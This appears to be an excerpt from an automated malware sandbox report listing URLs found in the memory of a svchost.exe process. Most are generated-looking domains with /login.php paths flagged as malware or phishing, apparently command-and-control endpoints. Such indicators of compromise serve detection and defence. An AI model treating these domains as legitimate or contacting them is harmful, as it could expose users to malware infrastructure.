                                                                                                                                                                                                            http://lysyfyj.com/login.phpsvchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegyhig.com/login.phprsvchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://cdn.ampproject.orgsvchost.exe, 00000002.00000003.2046327145.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611062842.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1988946544.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648233007.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700188363.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594762248.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527318064.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817173228.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579566890.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664821246.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597677482.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697141257.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634577560.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051783856.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786779268.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590640072.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662137463.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244104.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720435579.000000000B46F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://qegyhig.com/login.phpcsvchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lyryvex.com/login.phpgsvchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://gacynuz.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525680112.0000000002996000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lyxywen.com/svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070332.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650606873.00000000060EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lymysan.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://gacyzuz.com/login.phpsvchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://gahyzez.com/login.phpsvchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585285219.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://gahyhys.com/login.phpsvchost.exe, 00000002.00000003.1590675413.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591229349.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017552428.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606063186.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595288365.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594416015.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602654258.00000000029FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://galyvas.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://pupybul.com/Hsvchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lykyjad.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://gatyfus.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688061370.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://qebyrev.com/login.phprsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://ganyfes.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://vojycec.com/svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://volydot.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://pujygug.com/login.phpsvchost.exe, 00000002.00000003.1660127247.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lykyvod.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546775468.00000000029AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://vocydyc.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038097652.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044633046.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044910027.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2041626370.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lyxywer.com/login.phpsvchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lykymij.com/login.phpsvchost.exe, 00000002.00000002.2675178406.000000000B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663213294.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085531823.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
